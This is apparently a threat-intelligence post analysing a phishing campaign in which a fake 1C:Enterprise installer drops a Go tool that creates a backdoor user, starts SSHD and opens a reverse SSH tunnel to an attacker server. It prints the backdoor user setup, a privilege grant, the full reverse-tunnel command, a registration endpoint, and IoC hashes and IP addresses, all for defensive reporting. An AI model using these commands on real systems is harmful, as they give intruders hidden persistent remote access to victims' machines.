[ << ALL_FEED ]

Copy, copy, can you hear us?

More in General

Over, over, can you hear us? 😲
Despite the fact that hackers have recently gotten lazy and increasingly don’t develop anything of their own, original attack ideas still occasionally come along.

In an archive with the loud name 1С_модуль_заказа_дрон-v11.zip there’s a file called СВЯЗЬ РЭБ список Гум.exe with the yellow “1C” icon familiar to everyone. When the file is launched, the user sees the standard loading window of “1C:Enterprise 8.3” followed by the opening of a database (screenshot 1).

🎇 Let’s not fall for the bright pictures and dig deeper. Using sfextract, we gut the .NET installer. Among the unpacked files we find 1C_Module.dll with suspiciously large resources.

The library contains a huge number of legitimate “1C” classes, and the file itself at first glance looks like a legitimate module. But when searching for points of interaction with resources, we find a patched class \_1CManifestDelegateRunner.

In the InitManifest method, the resource _1C_Module.tmp is decrypted and saved to the temp folder. The decrypted file turns out to be a Go dropper that decrypts 2️⃣3️⃣ files. Among them:

📏 10 executable files
📏 6 scripts
📏 7 resource and config files

Most of the files are a complete set for setting up an SSH connection, public and private keys, and configs. The scripts perform the following actions:

📏 Create a new user with credentials:


  $sshUserName = "config"
  $sshUserPass = "[REDACTED]"
Code language: PowerShell (powershell)


📏 Copy all files to the folder C:\Program Files\System Event Service
📏 Launch SSHD and ssh-agent, having configured the public and private key
📏 Launch ntrights with the parameters -u "NT SERVICE\SSHD" +r SeAssignPrimaryTokenPrivilege
📏 Launch the mysterious file shh-tunnel.exe or, subsequently renamed, syseventservice-update.exe

❔ Let’s dwell on the last point in more detail, since shh-tunnel.exe is not part of standard SSH. This executable is written in Go and is a tool for establishing a tunnel, which we named Go2Tunnel. It pulls ports from the nearby config ssh_tunnel_config (or syseventservice-update_config) to create the tunnel:


C:\\Program Files\\System Event Service\\ssh.exe -R <ServerTunnelPort> :127.0.0.1:22 -N -T -i \"C:\\Program Files\\System Event Service\\event-server\" -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o ServerAliveInterval=45 -p<ServerSshPort> <ServerUserLogin>@<serverHostname>
Code language: YAML (yaml)


In the case when serverTunnelPort is not specified, a POST request is made to the following address:


http://<serverHostname>:<ServerWebPort>/tunnel/register
Code language: YAML (yaml)


😌🐱🐱

After creating the tunnel, Go2Tunnel itself just sleeps and eats and checks whether the server is working using the ps1 command:


-Command "Get-NetTCPConnection -RemoteAddress <serverHostname>  -RemotePort <ServerSshPort> -State Established -OwningProcess <sshProcess_Pid>"
Code language: plaintext (plaintext)


If there is no response, the SSH process is terminated, the address is resolved from the config, and the tunnel is restarted.

🎇 IoCs:

15b3dcd795d417c69a627e13382800cc0cf005e9f5d0345e22a02f460b052ea1
2de2c9ab37ce5abfcd7e9018b1cb00066209b0b9ecdf70249148f53389dca5b1
5faa4da85e2657682fd40f5a86d61e87a3e70c3dff81335f226437c755a89f4a
6aa1fc0c2b7a01952b92e7af4f69fc602d34da95a872c57e7cfe34e918086c89
957a9705b200cd0f059d62d7b21e97db260b9b6c0c5ddf20c38d236103cb799b
fac77b7f1150c00dd5ca9da0f93e2f073a7eb70e2f4fd82a267afbc938a6e175
16.16.179.83
5.252.22.10
Code language: plaintext (plaintext)


#TI #phishing #ioc
@ptescalator

More from ti_author

More from ti_author

More in General